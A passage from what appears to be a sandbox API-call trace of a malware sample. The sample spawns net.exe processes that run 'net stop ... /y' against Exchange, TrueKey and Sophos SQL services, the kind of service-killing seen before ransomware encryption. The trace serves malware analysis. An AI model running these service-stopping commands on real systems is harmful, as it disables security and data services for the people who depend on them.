lpBuffer=0x3762a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bfccc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfccc, lpOverlapped=0x0) returned 0 [0214.193] LocalFree (hMem=0x3762a8) returned 0x0 [0214.193] GetFileType (hFile=0x26c) returned 0x3 [0214.193] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3762a8 [0214.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3762a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n7", lpUsedDefaultChar=0x0) returned 2 [0214.193] WriteFile (in: hFile=0x26c, lpBuffer=0x3762a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfccc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfccc, lpOverlapped=0x0) returned 0 [0214.193] LocalFree (hMem=0x3762a8) returned 0x0 [0214.194] NetApiBufferFree (Buffer=0x371c70) returned 0x0 [0214.194] NetApiBufferFree (Buffer=0x371c88) returned 0x0 [0214.194] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMTA /y" [0214.194] exit (_Code=2) Process: id = "328" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5bff8000" os_pid = "0x5d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop TrueKeyScheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 501 os_tid = 0x438 Process: id = "329" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1a2b6000" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "328" os_parent_pid = "0x5d8" cmd_line = "C:\\Windows\\system32\\net1 stop TrueKeyScheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 502 os_tid = 0x6bc [0214.347] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbbc | out: lpSystemTimeAsFileTime=0x30fbbc*(dwLowDateTime=0x48f476a0, dwHighDateTime=0x1d57a87)) [0214.347] GetCurrentProcessId () returned 0xba4 [0214.347] GetCurrentThreadId () returned 0x6bc [0214.347] GetTickCount () returned 0x116f26b [0214.347] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbb4 | out: lpPerformanceCount=0x30fbb4*=33463166879) returned 1 [0214.347] GetModuleHandleA (lpModuleName=0x0) returned 0x450000 [0214.347] __set_app_type (_Type=0x1) [0214.347] __p__fmode () returned 0x74eb31f4 [0214.347] __p__commode () returned 0x74eb31fc [0214.348] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x45ffe6) returned 0x0 [0214.348] __getmainargs (in: _Argc=0x469064, _Argv=0x46906c, _Env=0x469068, _DoWildCard=0, _StartInfo=0x469024 | out: _Argc=0x469064, _Argv=0x46906c, _Env=0x469068) returned 0 [0214.348] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.348] GetConsoleOutputCP () returned 0x1b5 [0214.348] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x469080 | out: lpCPInfo=0x469080) returned 1 [0214.348] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.351] sprintf_s (in: _DstBuf=0x30fb74, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0214.351] setlocale (category=0, locale=".437") returned="English_United States.437" [0214.354] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0214.354] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0214.354] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyScheduler /y" [0214.354] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f940, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0214.354] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x74) returned 0x82f788 [0214.354] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0214.354] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fb44 | out: Buffer=0x30fb44*=0x831c78) returned 0x0 [0214.354] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fb44 | out: Buffer=0x30fb44*=0x831c90) returned 0x0 [0214.354] _fileno (_File=0x74eb2900) returned -2 [0214.354] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0214.354] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0214.354] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0214.354] _wcsicmp (_String1="config", _String2="stop") returned -16 [0214.354] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0214.354] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0214.354] _wcsicmp (_String1="file", _String2="stop") returned -13 [0214.354] _wcsicmp (_String1="files", _String2="stop") returned -13 [0214.354] _wcsicmp (_String1="group", _String2="stop") returned -12 [0214.354] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0214.355] _wcsicmp (_String1="help", _String2="stop") returned -11 [0214.355] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0214.355] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0214.355] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0214.355] _wcsicmp (_String1="session", _String2="stop") returned -15 [0214.355] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0214.355] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0214.355] _wcsicmp (_String1="share", _String2="stop") returned -12 [0214.355] _wcsicmp (_String1="start", _String2="stop") returned -14 [0214.355] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0214.355] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0214.355] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0214.355] _wcsicmp (_String1="accounts", _String2="TrueKeyScheduler") returned -19 [0214.355] _wcsicmp (_String1="computer", _String2="TrueKeyScheduler") returned -17 [0214.355] _wcsicmp (_String1="config", _String2="TrueKeyScheduler") returned -17 [0214.355] _wcsicmp (_String1="continue", _String2="TrueKeyScheduler") returned -17 [0214.355] _wcsicmp (_String1="cont", _String2="TrueKeyScheduler") returned -17 [0214.355] _wcsicmp (_String1="file", _String2="TrueKeyScheduler") returned -14 [0214.355] _wcsicmp (_String1="files", _String2="TrueKeyScheduler") returned -14 [0214.355] _wcsicmp (_String1="group", _String2="TrueKeyScheduler") returned -13 [0214.355] _wcsicmp (_String1="groups", _String2="TrueKeyScheduler") returned -13 [0214.355] _wcsicmp (_String1="help", _String2="TrueKeyScheduler") returned -12 [0214.355] _wcsicmp (_String1="helpmsg", _String2="TrueKeyScheduler") returned -12 [0214.355] _wcsicmp (_String1="localgroup", _String2="TrueKeyScheduler") returned -8 [0214.355] _wcsicmp (_String1="pause", _String2="TrueKeyScheduler") returned -4 [0214.355] _wcsicmp (_String1="session", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="sessions", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="sess", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="share", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="start", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="stats", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="statistics", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="stop", _String2="TrueKeyScheduler") returned -1 [0214.355] _wcsicmp (_String1="time", _String2="TrueKeyScheduler") returned -9 [0214.355] _wcsicmp (_String1="user", _String2="TrueKeyScheduler") returned 1 [0214.355] _wcsicmp (_String1="users", _String2="TrueKeyScheduler") returned 1 [0214.355] _wcsicmp (_String1="msg", _String2="TrueKeyScheduler") returned -7 [0214.356] _wcsicmp (_String1="messenger", _String2="TrueKeyScheduler") returned -7 [0214.356] _wcsicmp (_String1="receiver", _String2="TrueKeyScheduler") returned -2 [0214.356] _wcsicmp (_String1="rcv", _String2="TrueKeyScheduler") returned -2 [0214.356] _wcsicmp (_String1="netpopup", _String2="TrueKeyScheduler") returned -6 [0214.356] _wcsicmp (_String1="redirector", _String2="TrueKeyScheduler") returned -2 [0214.356] _wcsicmp (_String1="redir", _String2="TrueKeyScheduler") returned -2 [0214.356] _wcsicmp (_String1="rdr", _String2="TrueKeyScheduler") returned -2 [0214.356] _wcsicmp (_String1="workstation", _String2="TrueKeyScheduler") returned 3 [0214.356] _wcsicmp (_String1="work", _String2="TrueKeyScheduler") returned 3 [0214.356] _wcsicmp (_String1="wksta", _String2="TrueKeyScheduler") returned 3 [0214.356] _wcsicmp (_String1="prdr", _String2="TrueKeyScheduler") returned -4 [0214.356] _wcsicmp (_String1="devrdr", _String2="TrueKeyScheduler") returned -16 [0214.356] _wcsicmp (_String1="lanmanworkstation", _String2="TrueKeyScheduler") returned -8 [0214.356] _wcsicmp (_String1="server", _String2="TrueKeyScheduler") returned -1 [0214.356] _wcsicmp (_String1="svr", _String2="TrueKeyScheduler") returned -1 [0214.356] _wcsicmp (_String1="srv", _String2="TrueKeyScheduler") returned -1 [0214.356] _wcsicmp (_String1="lanmanserver", _String2="TrueKeyScheduler") returned -8 [0214.356] _wcsicmp (_String1="alerter", _String2="TrueKeyScheduler") returned -19 [0214.356] _wcsicmp (_String1="netlogon", _String2="TrueKeyScheduler") returned -6 [0214.356] _wcsupr (in: _String="TrueKeyScheduler" | out: _String="TRUEKEYSCHEDULER") returned="TRUEKEYSCHEDULER" [0214.356] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x835460 [0214.359] GetServiceKeyNameW (in: hSCManager=0x835460, lpDisplayName="TRUEKEYSCHEDULER", lpServiceName=0x46aaf0, lpcchBuffer=0x30fae0 | out: lpServiceName="", lpcchBuffer=0x30fae0) returned 0 [0214.359] _wcsicmp (_String1="msg", _String2="TRUEKEYSCHEDULER") returned -7 [0214.359] _wcsicmp (_String1="messenger", _String2="TRUEKEYSCHEDULER") returned -7 [0214.359] _wcsicmp (_String1="receiver", _String2="TRUEKEYSCHEDULER") returned -2 [0214.359] _wcsicmp (_String1="rcv", _String2="TRUEKEYSCHEDULER") returned -2 [0214.360] _wcsicmp (_String1="redirector", _String2="TRUEKEYSCHEDULER") returned -2 [0214.360] _wcsicmp (_String1="redir", _String2="TRUEKEYSCHEDULER") returned -2 [0214.360] _wcsicmp (_String1="rdr", _String2="TRUEKEYSCHEDULER") returned -2 [0214.360] _wcsicmp (_String1="workstation", _String2="TRUEKEYSCHEDULER") returned 3 [0214.360] _wcsicmp (_String1="work", _String2="TRUEKEYSCHEDULER") returned 3 [0214.360] _wcsicmp (_String1="wksta", _String2="TRUEKEYSCHEDULER") returned 3 [0214.360] _wcsicmp (_String1="prdr", _String2="TRUEKEYSCHEDULER") returned -4 [0214.360] _wcsicmp (_String1="devrdr", _String2="TRUEKEYSCHEDULER") returned -16 [0214.360] _wcsicmp (_String1="lanmanworkstation", _String2="TRUEKEYSCHEDULER") returned -8 [0214.360] _wcsicmp (_String1="server", _String2="TRUEKEYSCHEDULER") returned -1 [0214.360] _wcsicmp (_String1="svr", _String2="TRUEKEYSCHEDULER") returned -1 [0214.360] _wcsicmp (_String1="srv", _String2="TRUEKEYSCHEDULER") returned -1 [0214.360] _wcsicmp (_String1="lanmanserver", _String2="TRUEKEYSCHEDULER") returned -8 [0214.360] _wcsicmp (_String1="alerter", _String2="TRUEKEYSCHEDULER") returned -19 [0214.360] _wcsicmp (_String1="netlogon", _String2="TRUEKEYSCHEDULER") returned -6 [0214.360] NetServiceControl (in: servername=0x0, service="TRUEKEYSCHEDULER", opcode=0x0, arg=0x0, bufptr=0x30fadc | out: bufptr=0x30fadc) returned 0x889 [0214.361] wcscpy_s (in: _Destination=0x46a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0214.361] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0214.362] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x46b338, nSize=0x800, Arguments=0x469dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0214.363] GetFileType (hFile=0x26c) returned 0x3 [0214.363] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x833f90 [0214.363] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x833f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0214.363] WriteFile (in: hFile=0x26c, lpBuffer=0x833f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0) returned 0 [0214.363] LocalFree (hMem=0x833f90) returned 0x0 [0214.363] GetFileType (hFile=0x26c) returned 0x3 [0214.363] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x836238 [0214.363] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x836238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x83", lpUsedDefaultChar=0x0) returned 2 [0214.363] WriteFile (in: hFile=0x26c, lpBuffer=0x836238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0) returned 0 [0214.363] LocalFree (hMem=0x836238) returned 0x0 [0214.363] _ultow (in: _Dest=0x889, _Radix=3209804 | out: _Dest=0x889) returned="2185" [0214.363] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x46b338, nSize=0x800, Arguments=0x469dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0214.363] GetFileType (hFile=0x26c) returned 0x3 [0214.364] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x836238 [0214.364] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x836238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0214.364] WriteFile (in: hFile=0x26c, lpBuffer=0x836238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30fa28, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa28, lpOverlapped=0x0) returned 0 [0214.364] LocalFree (hMem=0x836238) returned 0x0 [0214.364] GetFileType (hFile=0x26c) returned 0x3 [0214.364] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x836238 [0214.364] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x836238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x83", lpUsedDefaultChar=0x0) returned 2 [0214.364] WriteFile (in: hFile=0x26c, lpBuffer=0x836238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fa28, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa28, lpOverlapped=0x0) returned 0 [0214.364] LocalFree (hMem=0x836238) returned 0x0 [0214.364] NetApiBufferFree (Buffer=0x831c78) returned 0x0 [0214.364] NetApiBufferFree (Buffer=0x831c90) returned 0x0 [0214.365] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyScheduler /y" [0214.365] exit (_Code=2) Process: id = "330" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x523fd000" os_pid = "0x4a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 503 os_tid = 0x64 Process: id = "331" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x52714000" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "330" os_parent_pid = "0x4a4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 504 os_tid = 0xbd0 [0214.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fefc | out: lpSystemTimeAsFileTime=0x22fefc*(dwLowDateTime=0x490c4460, dwHighDateTime=0x1d57a87)) [0214.516] GetCurrentProcessId () returned 0x310 [0214.516] GetCurrentThreadId () returned 0xbd0 [0214.516] GetTickCount () returned 0x116f307 [0214.516] QueryPerformanceCounter (in: lpPerformanceCount=0x22fef4 | out: lpPerformanceCount=0x22fef4*=33480064687) returned 1 [0214.516] GetModuleHandleA (lpModuleName=0x0) returned 0x600000 [0214.516] __set_app_type (_Type=0x1) [0214.516] __p__fmode () returned 0x74eb31f4 [0214.516] __p__commode () returned 0x74eb31fc [0214.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x60ffe6) returned 0x0 [0214.517] __getmainargs (in: _Argc=0x619064, _Argv=0x61906c, _Env=0x619068, _DoWildCard=0, _StartInfo=0x619024 | out: _Argc=0x619064, _Argv=0x61906c, _Env=0x619068) returned 0 [0214.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.517] GetConsoleOutputCP () returned 0x1b5 [0214.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x619080 | out: lpCPInfo=0x619080) returned 1 [0214.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.521] sprintf_s (in: _DstBuf=0x22feb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0214.521] setlocale (category=0, locale=".437") returned="English_United States.437" [0214.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0214.523] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0214.523] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SOPHOS /y" [0214.523] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22fc80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0214.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6c) returned 0x2f3c10 [0214.523] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0214.524] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fe84 | out: Buffer=0x22fe84*=0x2f1c70) returned 0x0 [0214.524] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fe84 | out: Buffer=0x22fe84*=0x2f1c88) returned 0x0 [0214.524] _fileno (_File=0x74eb2900) returned -2 [0214.524] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0214.524] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0214.524] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0214.524] _wcsicmp (_String1="config", _String2="stop") returned -16 [0214.524] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0214.524] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0214.524] _wcsicmp (_String1="file", _String2="stop") returned -13 [0214.524] _wcsicmp (_String1="files", _String2="stop") returned -13 [0214.524] _wcsicmp (_String1="group", _String2="stop") returned -12 [0214.524] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0214.524] _wcsicmp (_String1="help", _String2="stop") returned -11 [0214.524] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0214.524] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0214.524] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0214.524] _wcsicmp (_String1="session", _String2="stop") returned -15 [0214.524] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0214.524] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0214.524] _wcsicmp (_String1="share", _String2="stop") returned -12 [0214.524] _wcsicmp (_String1="start", _String2="stop") returned -14 [0214.524] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0214.524] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0214.524] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0214.524] _wcsicmp (_String1="accounts", _String2="MSSQL$SOPHOS") returned -12 [0214.524] _wcsicmp (_String1="computer", _String2="MSSQL$SOPHOS") returned -10 [0214.524] _wcsicmp (_String1="config", _String2="MSSQL$SOPHOS") returned -10 [0214.524] _wcsicmp (_String1="continue", _String2="MSSQL$SOPHOS") returned -10 [0214.525] _wcsicmp (_String1="cont", _String2="MSSQL$SOPHOS") returned -10 [0214.525] _wcsicmp (_String1="file", _String2="MSSQL$SOPHOS") returned -7 [0214.525] _wcsicmp (_String1="files", _String2="MSSQL$SOPHOS") returned -7 [0214.525] _wcsicmp (_String1="group", _String2="MSSQL$SOPHOS") returned -6 [0214.525] _wcsicmp (_String1="groups", _String2="MSSQL$SOPHOS") returned -6 [0214.525] _wcsicmp (_String1="help", _String2="MSSQL$SOPHOS") returned -5 [0214.525] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SOPHOS") returned -5 [0214.525] _wcsicmp (_String1="localgroup", _String2="MSSQL$SOPHOS") returned -1 [0214.525] _wcsicmp (_String1="pause", _String2="MSSQL$SOPHOS") returned 3 [0214.525] _wcsicmp (_String1="session", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="sessions", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="sess", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="share", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="start", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="stats", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="statistics", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="stop", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="time", _String2="MSSQL$SOPHOS") returned 7 [0214.525] _wcsicmp (_String1="user", _String2="MSSQL$SOPHOS") returned 8 [0214.525] _wcsicmp (_String1="users", _String2="MSSQL$SOPHOS") returned 8 [0214.525] _wcsicmp (_String1="msg", _String2="MSSQL$SOPHOS") returned -12 [0214.525] _wcsicmp (_String1="messenger", _String2="MSSQL$SOPHOS") returned -14 [0214.525] _wcsicmp (_String1="receiver", _String2="MSSQL$SOPHOS") returned 5 [0214.525] _wcsicmp (_String1="rcv", _String2="MSSQL$SOPHOS") returned 5 [0214.525] _wcsicmp (_String1="netpopup", _String2="MSSQL$SOPHOS") returned 1 [0214.525] _wcsicmp (_String1="redirector", _String2="MSSQL$SOPHOS") returned 5 [0214.525] _wcsicmp (_String1="redir", _String2="MSSQL$SOPHOS") returned 5 [0214.525] _wcsicmp (_String1="rdr", _String2="MSSQL$SOPHOS") returned 5 [0214.525] _wcsicmp (_String1="workstation", _String2="MSSQL$SOPHOS") returned 10 [0214.525] _wcsicmp (_String1="work", _String2="MSSQL$SOPHOS") returned 10 [0214.525] _wcsicmp (_String1="wksta", _String2="MSSQL$SOPHOS") returned 10 [0214.525] _wcsicmp (_String1="prdr", _String2="MSSQL$SOPHOS") returned 3 [0214.525] _wcsicmp (_String1="devrdr", _String2="MSSQL$SOPHOS") returned -9 [0214.525] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SOPHOS") returned -1 [0214.525] _wcsicmp (_String1="server", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="svr", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="srv", _String2="MSSQL$SOPHOS") returned 6 [0214.525] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SOPHOS") returned -1 [0214.526] _wcsicmp (_String1="alerter", _String2="MSSQL$SOPHOS") returned -12 [0214.526] _wcsicmp (_String1="netlogon", _String2="MSSQL$SOPHOS") returned 1 [0214.526] _wcsupr (in: _String="MSSQL$SOPHOS" | out: _String="MSSQL$SOPHOS") returned="MSSQL$SOPHOS" [0214.526] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2f54d0 [0214.528] GetServiceKeyNameW (in: hSCManager=0x2f54d0, lpDisplayName="MSSQL$SOPHOS", lpServiceName=0x61aaf0, lpcchBuffer=0x22fe20 | out: lpServiceName="", lpcchBuffer=0x22fe20) returned 0 [0214.529] _wcsicmp (_String1="msg", _String2="MSSQL$SOPHOS") returned -12 [0214.529] _wcsicmp (_String1="messenger", _String2="MSSQL$SOPHOS") returned -14 [0214.529] _wcsicmp (_String1="receiver", _String2="MSSQL$SOPHOS") returned 5 [0214.529] _wcsicmp (_String1="rcv", _String2="MSSQL$SOPHOS") returned 5 [0214.529] _wcsicmp (_String1="redirector", _String2="MSSQL$SOPHOS") returned 5 [0214.529] _wcsicmp (_String1="redir", _String2="MSSQL$SOPHOS") returned 5 [0214.529] _wcsicmp (_String1="rdr", _String2="MSSQL$SOPHOS") returned 5 [0214.529] _wcsicmp (_String1="workstation", _String2="MSSQL$SOPHOS") returned 10 [0214.529] _wcsicmp (_String1="work", _String2="MSSQL$SOPHOS") returned 10 [0214.529] _wcsicmp (_String1="wksta", _String2="MSSQL$SOPHOS") returned 10 [0214.529] _wcsicmp (_String1="prdr", _String2="MSSQL$SOPHOS") returned 3 [0214.529] _wcsicmp (_String1="devrdr", _String2="MSSQL$SOPHOS") returned -9 [0214.529] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SOPHOS") returned -1 [0214.529] _wcsicmp (_String1="server", _String2="MSSQL$SOPHOS") returned 6 [0214.529] _wcsicmp (_String1="svr", _String2="MSSQL$SOPHOS") returned 6 [0214.529] _wcsicmp (_String1="srv", _String2="MSSQL$SOPHOS") returned 6 [0214.529] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SOPHOS") returned -1 [0214.529] _wcsicmp (_String1="alerter", _String2="MSSQL$SOPHOS") returned -12 [0214.529] _wcsicmp (_String1="netlogon", _String2="MSSQL$SOPHOS") returned 1 [0214.529] NetServiceControl (in: servername=0x0, service="MSSQL$SOPHOS", opcode=0x0, arg=0x0, bufptr=0x22fe1c | out: bufptr=0x22fe1c) returned 0x889 [0214.530] wcscpy_s (in: _Destination=0x61a4e8, 